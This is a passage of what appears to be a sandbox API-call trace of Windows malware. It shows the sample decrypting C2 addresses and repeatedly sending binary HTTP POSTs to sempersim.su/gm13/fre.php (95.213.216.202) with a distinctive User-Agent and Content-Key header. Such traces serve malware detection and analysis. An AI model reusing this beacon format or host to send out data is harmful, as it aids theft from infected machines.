(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0186.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.087] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0186.087] GetProcessHeap () returned 0x620000 [0186.087] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0186.087] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0186.087] GetProcessHeap () returned 0x620000 [0186.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0186.088] GetProcessHeap () returned 0x620000 [0186.088] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0186.091] GetProcessHeap () returned 0x620000 [0186.091] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0186.091] GetProcessHeap () returned 0x620000 [0186.091] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x6432d8 [0186.092] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.092] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0186.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.099] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0186.109] GetProcessHeap () returned 0x620000 [0186.109] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0186.109] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.110] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0186.111] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.111] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0186.112] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.112] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0186.112] GetProcessHeap () returned 0x620000 [0186.113] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0186.113] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.114] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6432d8, pdwDataLen=0x19fcfc | out: pbData=0x6432d8, pdwDataLen=0x19fcfc) returned 1 [0186.114] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.115] CryptDestroyKey (hKey=0x62d190) returned 1 [0186.115] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0186.115] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0186.115] GetProcessHeap () returned 0x620000 [0186.116] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644fb8 [0186.116] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.117] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0186.117] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.117] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0186.118] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0186.118] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0186.118] GetProcessHeap () returned 0x620000 [0186.118] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0186.118] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebf8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0186.120] GetProcessHeap () returned 0x620000 [0186.120] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5b0 [0186.120] socket (af=2, type=1, protocol=6) returned 0x344 [0186.120] connect (s=0x344, name=0x63ebf8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0186.175] FreeAddrInfoW (pAddrInfo=0x644bf8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ebf8*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0186.175] GetProcessHeap () returned 0x620000 [0186.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63bcb0 [0186.175] GetProcessHeap () returned 0x620000 [0186.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0186.176] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0186.176] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0186.177] GetProcessHeap () returned 0x620000 [0186.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0186.177] GetProcessHeap () returned 0x620000 [0186.177] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0186.177] GetProcessHeap () returned 0x620000 [0186.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x642e58 [0186.177] GetProcessHeap () returned 0x620000 [0186.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0186.178] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0186.179] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0186.179] GetProcessHeap () returned 0x620000 [0186.179] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0186.179] GetProcessHeap () returned 0x620000 [0186.179] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0186.179] send (s=0x344, buf=0x63a880*, len=237, flags=0) returned 237 [0186.180] send (s=0x344, buf=0x6421e0*, len=159, flags=0) returned 159 [0186.180] GetProcessHeap () returned 0x620000 [0186.180] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0186.180] recv (in: s=0x344, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0187.294] GetProcessHeap () returned 0x620000 [0187.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0187.295] GetProcessHeap () returned 0x620000 [0187.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0187.295] GetProcessHeap () returned 0x620000 [0187.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0187.295] GetProcessHeap () returned 0x620000 [0187.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63bcb0 | out: hHeap=0x620000) returned 1 [0187.296] closesocket (s=0x344) returned 0 [0187.296] GetProcessHeap () returned 0x620000 [0187.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5b0 | out: hHeap=0x620000) returned 1 [0187.296] GetProcessHeap () returned 0x620000 [0187.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644fb8 | out: hHeap=0x620000) returned 1 [0187.297] GetProcessHeap () returned 0x620000 [0187.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6432d8 | out: hHeap=0x620000) returned 1 [0187.297] GetProcessHeap () returned 0x620000 [0187.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0187.297] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xca4) returned 0x344 [0187.299] Sleep (dwMilliseconds=0xea60) [0187.307] GetProcessHeap () returned 0x620000 [0187.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0187.308] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.308] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.314] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.315] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0187.322] GetProcessHeap () returned 0x620000 [0187.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x6390f8 [0187.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.323] CryptImportKey (in: hProv=0x63ba90, pbData=0x6390f8*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0187.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.413] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.414] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.414] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.414] GetProcessHeap () returned 0x620000 [0187.415] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6390f8 | out: hHeap=0x620000) returned 1 [0187.415] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.416] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0187.417] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.417] CryptDestroyKey (hKey=0x62d710) returned 1 [0187.418] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.418] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0187.418] GetProcessHeap () returned 0x620000 [0187.418] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646548 [0187.419] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.419] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0187.420] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.420] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0187.421] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.421] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0187.422] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.422] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0187.422] GetProcessHeap () returned 0x620000 [0187.422] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0187.422] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0187.422] GetProcessHeap () returned 0x620000 [0187.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0187.423] GetProcessHeap () returned 0x620000 [0187.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646548 | out: hHeap=0x620000) returned 1 [0187.423] GetProcessHeap () returned 0x620000 [0187.423] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0187.423] GetProcessHeap () returned 0x620000 [0187.423] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0187.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.424] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0187.430] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.431] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0187.437] GetProcessHeap () returned 0x620000 [0187.437] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0187.438] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.438] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0187.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.439] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0187.439] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.440] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0187.440] GetProcessHeap () returned 0x620000 [0187.440] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0187.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.441] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0187.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.442] CryptDestroyKey (hKey=0x62d710) returned 1 [0187.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0187.442] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0187.442] GetProcessHeap () returned 0x620000 [0187.442] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646320 [0187.443] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.443] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0187.444] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.444] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0187.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0187.445] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0187.445] GetProcessHeap () returned 0x620000 [0187.445] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0187.445] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x644748*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0187.447] GetProcessHeap () returned 0x620000 [0187.447] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b4f0 [0187.447] socket (af=2, type=1, protocol=6) returned 0x348 [0187.447] connect (s=0x348, name=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0187.500] FreeAddrInfoW (pAddrInfo=0x644748*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea60*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0187.500] GetProcessHeap () returned 0x620000 [0187.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0187.501] GetProcessHeap () returned 0x620000 [0187.501] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0187.501] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0187.502] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0187.502] GetProcessHeap () returned 0x620000 [0187.502] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0187.502] GetProcessHeap () returned 0x620000 [0187.503] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0187.503] GetProcessHeap () returned 0x620000 [0187.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643128 [0187.503] GetProcessHeap () returned 0x620000 [0187.503] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0187.504] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0187.505] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0187.505] GetProcessHeap () returned 0x620000 [0187.505] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0187.505] GetProcessHeap () returned 0x620000 [0187.506] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0187.506] send (s=0x348, buf=0x63a880*, len=237, flags=0) returned 237 [0187.507] send (s=0x348, buf=0x6421e0*, len=159, flags=0) returned 159 [0187.507] GetProcessHeap () returned 0x620000 [0187.507] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0187.507] recv (in: s=0x348, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0189.205] GetProcessHeap () returned 0x620000 [0189.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0189.205] GetProcessHeap () returned 0x620000 [0189.205] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643128 | out: hHeap=0x620000) returned 1 [0189.205] GetProcessHeap () returned 0x620000 [0189.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0189.206] GetProcessHeap () returned 0x620000 [0189.206] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0189.206] closesocket (s=0x348) returned 0 [0189.207] GetProcessHeap () returned 0x620000 [0189.207] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b4f0 | out: hHeap=0x620000) returned 1 [0189.207] GetProcessHeap () returned 0x620000 [0189.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646320 | out: hHeap=0x620000) returned 1 [0189.208] GetProcessHeap () returned 0x620000 [0189.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643248 | out: hHeap=0x620000) returned 1 [0189.208] GetProcessHeap () returned 0x620000 [0189.208] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0189.209] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x934) returned 0x348 [0189.211] Sleep (dwMilliseconds=0xea60) [0189.223] GetProcessHeap () returned 0x620000 [0189.224] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643050 [0189.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.227] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0189.237] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.237] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0189.248] GetProcessHeap () returned 0x620000 [0189.248] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0189.249] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.249] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0189.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.251] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0189.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.252] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0189.252] GetProcessHeap () returned 0x620000 [0189.252] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0189.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.253] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643050, pdwDataLen=0x19fcfc | out: pbData=0x643050, pdwDataLen=0x19fcfc) returned 1 [0189.254] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.255] CryptDestroyKey (hKey=0x62d710) returned 1 [0189.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0189.262] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0189.262] GetProcessHeap () returned 0x620000 [0189.262] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0189.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.263] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0189.264] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.264] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0189.265] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.265] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0189.266] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0189.266] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0189.266] GetProcessHeap () returned 0x620000 [0189.266] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0189.266] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0189.266] GetProcessHeap () returned 0x620000 [0189.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0189.267] GetProcessHeap () returned 0x620000 [0189.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0189.267] GetProcessHeap () returned 0x620000 [0189.268] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0189.268] GetProcessHeap () returned 0x620000 [0189.268] 